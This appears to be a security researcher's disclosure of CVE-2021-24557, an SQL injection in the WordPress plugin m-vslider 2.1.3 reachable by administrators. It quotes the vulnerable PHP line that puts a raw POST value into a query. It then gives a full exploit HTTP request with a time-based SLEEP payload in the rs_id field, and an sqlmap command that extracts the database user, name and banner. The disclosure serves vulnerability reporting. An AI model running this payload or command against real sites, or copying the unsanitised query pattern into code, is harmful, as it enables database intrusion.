Plugin Details
Plugin Name: wp-plugin : m-vslider
Effected Version : 2.1.3 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24557
Identified by : Shreya Pohekar
Disclosure Timeline
-
May 14, 2021: Issue Identified and Disclosed to WPScan
- May 19, 2021 : Plugin Closed
- July 20, 2021 : CVE Assigned
- July 23, 2021 : Public Disclosure
Technical Details
The update functionality in the rslider_page uses rs_id
as a POST parameter that is not validated, sanitised or escaped before being inserted in sql query, therefore leading to SQL injection for users having Administrator role.\n
Vulnerable Code: rslider.php#L374
374: $ $updatequery .= " WHERE rs_id = " . $_POST['rs_id'];
PoC Screenshot
Exploit
POST /wp-admin/admin.php?page=rslider_page&updated=true HTTP/1.1
Host: 172.28.128.50
Content-Length: 424
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/admin.php?page=rslider_page
Accept-Language: en-US,en;q=0.9
Cookie: spf-last-metabox-tab-12-_sptp_generator=_sptp_generator_1; spf-last-metabox-tab-14-_sptp_generator=_sptp_generator_1; wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1619784669%7CqTnNMQIcB6qyLJ4wbLSDz4TgZNqTVBscu1jNj8pFlfl%7Ce8b173e02d87095d6cd04209dbfeda32a85a82d72b684e5e4db9e8da3c25c610; __eucookielaw=true; giveasap_110=5852970951c80fcaa281efebddaaf1b3; _ga=GA1.1.436418670.1617784311; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1619288085; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1619784669%7CqTnNMQIcB6qyLJ4wbLSDz4TgZNqTVBscu1jNj8pFlfl%7Cb4cc1181f3020f37b67c5d7020c67fffbd647bfa363a2f07198baf1189be58db; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist; wp-settings-time-1=1619611876
Connection: close
tcOptions=process&rs_id=2%20AND%20(SELECT%209727%20FROM%20(SELECT(SLEEP(5)))KZOZ)&rs_name=asd&rs_width=250&rs_height=250&rs_animstyle=fade&rs_slices=15&rs_boxCols=8&rs_boxRows=4&rs_theme=bar&rs_type=sequence&rs_speed=1300&rs_timeout=5&rs_css=margin%3A+0px+0px+0px+0px%3Bpadding%3A+0%3Bborder%3A+none%3B&rs_img0=&rs_lnk0=&rs_cap0=&rs_img1=&rs_lnk1=&rs_cap1=&rs_img2=&rs_lnk2=&rs_cap2=&rs_img3=&rs_lnk3=&rs_cap3=&rs_img4=&rs_lnk4=&rs_cap4=&rs_totalimgs=5&save=Save+Settings
SQLMap Command
sqlmap -r m-vslider.req --dbms mysql --current-user --current-db -b -p rs_id